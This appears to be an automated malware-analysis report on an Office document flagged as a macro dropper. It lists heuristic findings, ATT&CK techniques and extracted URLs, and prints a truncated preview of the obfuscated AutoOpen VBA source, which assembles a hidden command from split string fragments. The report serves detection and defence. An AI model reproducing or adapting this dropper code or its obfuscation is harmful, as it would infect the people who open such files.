MALICIOUS
370
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
This Office document contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. The macro utilizes a reassembled string 'scripting.filesystemobject' and a Shell() call, indicating an intent to interact with the file system and execute commands. This strongly suggests the document is a dropper designed to download and execute a second-stage payload.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-7154332-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7154332-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 279867 bytes |
SHA-256: 07c72cf2a60aa4b72e009aa661c5f0effac49bd0567fb65a7e45cb30b784cfce |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Function wefwef() wefiwef = wefwihefj wiguowef = "fweweIUF" End Function Public Function eeewewewie() MsgBox "lol" End Function Sub AutoOpen() Const auutgd = False Const pue_uofn = False Const zjkcey = False Const ue_pmeo = False Const oeiui = True Const agdiunv = False Const tdwcorm = False Const iuuhw = False Const ygvcbqpxc = True Select Case 42 - 70 Case -28 iuoh = "$yyyywiayoraaeuufio_pkdtuicxco" Case bexsagnj_ik Const txtvny = True Const owmtojk = False Const yops_qsoa = False End Select Select Case 13 - 78 Case -65 bay_eyfokh = iuoh Const oe_yobj = False bay_eyfokh = bay_eyfokh + "_hve='m 465;if';$oaj" Case 13069 Const bjiofke0 = True End Select Const qkyc_i_ku = True Select Case "vweea2" Case "vweea2" biukeitwht = yqsfva + bay_eyfokh + ghhioyoi kloe = "xnpelow_" Const owctmbw = True Const e_jhyaia = True biukeitwht = biukeitwht + kloe + iioaa_ogu End Select Const ti_uybi54 = False If 54 * 86 = 9819 Then Const ud_uoe = True Const spyukno = True Const yzdrktymx = True Const xpksi = True ElseIf 5207 >= 1483 Then ogwafmdt = biukeitwht Const mbibrdji = True Const mlqlmcaxt2 = False Const fjvppo = False o_zkaa = "eiixidfokcgjsk" ogwafmdt = ogwafmdt + o_zkaa Else Const ik_euojl = False Const kkdgxfat_cb = True Const rfjmfe_o = True Const atxarh = False Const gwhpex = True End If Const rg_mi50 = True Select Case "ywmyppzgvte_a" Case "ywmyppzgvte_a" fajm_eabqe = "e_vqdkio" ogwafmdt = ogwafmdt + fajm_eabqe End Select Select Case "yuaiecwrvu" Case "yuaiecwrvu" ieqb = "ar_ir='//s'" Const qgualry = True ogwafmdt = ogwafmdt + ieqb End Select Select Case "bmghabpfx" Case iyywv Const azdibmy = True Const rpotxi = False Const ychxdxkpa = True Case "bmghabpfx" gbryem = ogwafmdt vjvzgcvgcg_ni = ";$pksueau_oi_aqyhci_uyg='ntz''" gbryem = yui_woe + gbryem + vjvzgcvgcg_ni End Select Const ffseht = True Select Case 38 + 86 Case 124 aeud = ")';$dpimoqli_xbyzku='while(1';$teupytxdss" gbryem = thmuufhh + gbryem + aeud + ueccghdtt Case tfleiust Const uyvlapv = False Const eybuau00 = True Const uupai = False End Select Select Case "uvzgsdkahrqq" Case "uvzgsdkahrqq" a_iid = xfeokcqoi + gbryem Const eydjht = True aiojtawd = "rfitzzpjzaujthv" Const ivavp = True a_iid = noybmuyq_a + a_iid + aiojtawd + czmtga End Select Select Case 52 - 15 Case 37 a_iid = a_iid + "hsh='ient).Do';$eulv_ehtxnhgiislpwusnunzrictb" Case i_ail Const uhayyy = True Const veogz = True Case 9583 Const oagd = True Const eu_ou = True End Select Select Case "yomkhdalt" Case "yomkhdalt" wgelh_mn = "zdswdwj_" a_iid = a_iid + wgelh_mn End Select Select Case "umvshuebcg" Case 30578 Const utjogu = False Const lxfczmi = True Const wofpacxm0 = False Case ufafkvl Const icrqqu = True Const sdkie = False Const ouxhy = True Case "umvshuebcg" oqmiriai = tf_ktaavsai + a_iid Const xhhhicdl = True ourslk = "yi21='UF';$uiswlvu_v" oqmiriai = oqmiriai + ourslk End Select Const gw_xdoa = False Select Case "r_opeqy" Case "r_opeqy" yzgfcezdtfii = oqmiriai + ranncvvubw Const zhnjcree = True ygjyoyg = "kixduqwlnavnayxue='h , ''f1''" yzgfcezdtfii = yzgfcezdtfii + ygjyoyg Case ghzusxn Const auryua = True Const oxhyou = True End Select Const wns_eaa = False Select Case 40 * 98 Case 23958 Const aiouaa = False Const uhapj = True Case 3920 ii_illw = yzgfcezdtfii Const fitqnoi = False Const ehadldte = True bcoimcn_ese = "';$y_oyuyjgiy" Const lbdii = False ii_illw = ddpc_rcmrc + ii_illw + bcoimcn_ese End Select Const lhmjji = True Select Case "ftheiyuua" Case "ftheiyuua" eadtgp_ea = "hcp='bjy" Const lojsmlc = True ii_illw = ii_illw + eadtgp_ea End Select Const twniu = False Const worgnin = True If 71 - 19 = 52 The ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.